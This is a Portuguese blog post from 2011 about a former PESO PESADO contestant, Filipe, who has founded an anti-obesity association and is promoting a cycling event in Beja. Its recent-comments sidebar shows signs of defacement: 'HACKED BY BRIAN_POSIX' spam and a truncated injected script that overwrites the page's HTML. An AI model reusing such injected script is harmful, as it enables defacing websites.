Saúde Metabólica @ 18:18

Seg, 31/10/11

Curiosamente, todos pensam que o Filipe, irá conseguir controlar o seu peso através de uma dieta especial e de longas horas de esforço físico no ginásio. Não acredito nisso. Acredito que o Filipe conseguirá controlar o seu peso, para o resto da vida, se tiver condições físicas, psicológicas, emocionais, financeiras, entre outras, para o fazer.

 

Acredito que acima de tudo, o Filipe deverá ter um projecto de vida que o ajude a sentir-se realizado profissionalmente e pessoalmente. O programa PESO PESADO, mais do que um programa de emagrecimento, foi um pontapé de saída para uma nova vida. E é isso que o Filipe está a fazer, a agarrar a oportunidade que lhe foi concedida como se fosse a última. Prova disso é a criação de uma associação com o nome: Movimento Contra a Obesidade, Mco.

 

O primeiro evento está já agendado para Novembro (12 e 13) através de uma Maratona de BTT e de outras actividades como a culinária e workshops de alimentação saudável. Esse evento pretende juntar todos os ex-concorrentes do programa PESO PESADO e conta já com o apoio de algumas marcas que se quiseram associar ao evento. Filipe tem o total apoio da câmara de Beja e é uma pessoa querida na sua cidade. Esse evento desportivo contará ainda com a presença de algumas figuras ilustres do panorama desportivo português. Qualquer um de nós poderá estar presente neste evento ajudando o Filipe a construir o seu projecto de vida que passa por dinamizar a sua terra natal.

VAMOS PEDALAR COM O FILIPE EM BEJA…

 

Visite www.apmco.pt e faça a sua inscrição.


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO